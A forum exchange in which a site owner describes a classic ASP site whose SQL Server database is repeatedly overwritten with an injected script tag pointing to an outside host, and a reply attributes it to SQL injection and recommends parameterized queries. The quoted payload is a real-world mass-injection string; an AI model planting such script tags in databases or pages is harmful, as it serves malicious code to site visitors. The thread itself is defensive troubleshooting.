I am having a serious issue with our sql database.
We have SQL Server Express 2005 running a Windows 2003 Web Edition virtual machine.
We have a classic ASP website that uses this database and runs in the same server.
Our database is being constantly attacked, updating all rows with values like "<script src="http://ecall09edytu.rr.nu/sl.php?v=2"></script>"
I don't know how they are getting access to do this.
I have changed all passwords, limited the access to the server (ftp and remote desktop) to only my personal ip, disabled remote access to sql server...
Anything you can think of will be greatly appreciated.
This looks like a combination of SQL injection and cross-site scripting. The cause of SQL injection is failure to use parameterized queries in application code. If one builds SQL statement strings by concatenating user input, a malicious user can manipulate
the SQL statement so that other than the one intended is executed.
Dan Guzman, SQL Server MVP, http://weblogs.sqlteam.com/dang/